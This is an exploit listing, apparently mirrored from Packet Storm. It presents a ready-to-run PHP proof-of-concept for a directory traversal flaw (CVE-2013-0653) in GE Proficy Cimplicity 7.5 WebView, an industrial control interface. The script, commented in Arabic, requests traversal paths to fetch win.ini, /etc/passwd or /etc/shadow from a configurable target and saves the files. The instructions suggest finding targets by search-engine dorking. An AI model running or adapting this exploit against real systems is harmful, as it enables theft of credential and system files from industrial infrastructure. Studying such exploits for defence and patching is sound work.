Share
## https://sploitus.com/exploit?id=PACKETSTORM:189797
=============================================================================================================================================
    | # Title     : GE Proficy Cimplicity 7.5 Directory Traversal Vulnerability                                                                 |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.alliedsolutions.com.vn/products/proficy-cimplicity/                                                             |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: This script is written in PHP to simulate the exploitation of the Directory Traversal vulnerability in GE Proficy Cimplicity WebView, which allows sensitive files on the targeted server to be read.
    
       (Related : https://packetstorm.news/files/id/180783/ Linked CVE numbers: CVE-2013-0653 ) .
    	
    [+] save code as poc.php.
    
    [+] Set target : line 3
    
    [+] PayLoad :
    
    <?php
    // إعدادات الاستغلال
    $target = "http://192.168.1.100:80"; // عنوان الهدف
    $target_uri = "/CimWeb/gefebt.exe";
    $depth = 5; // عدد القفزات العكسية
    
    // اختيار الملف بناءً على نظام التشغيل المستهدف
    $os = "windows"; // يمكن تغييره إلى linux أو macos أو unix
    
    switch (strtolower($os)) {
        case "windows":
            $filepath = "/windows/win.ini";
            break;
        case "linux":
            $filepath = "/etc/passwd";
            break;
        case "macos":
            $filepath = "/etc/passwd";
            break;
        case "unix":
            $filepath = "/etc/shadow";
            break;
        default:
            die("نظام التشغيل غير مدعوم!\n");
    }
    
    // إنشاء المسار العكسي للاستغلال
    $traversal = str_repeat("../", $depth) . $filepath;
    $url = "{$target}{$target_uri}?substitute.bcl+FILE=" . urlencode($traversal);
    
    echo "[+] محاولة استرجاع الملف: {$filepath}\n";
    
    // تنفيذ الطلب
    $response = @file_get_contents($url);
    
    if ($response === false) {
        die("[-] فشل في استرجاع الملف!\n");
    }
    
    // حفظ المحتوى في ملف
    $file_name = basename($filepath);
    file_put_contents($file_name, $response);
    
    echo "[+] تم حفظ الملف في: {$file_name}\n";
    ?>
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================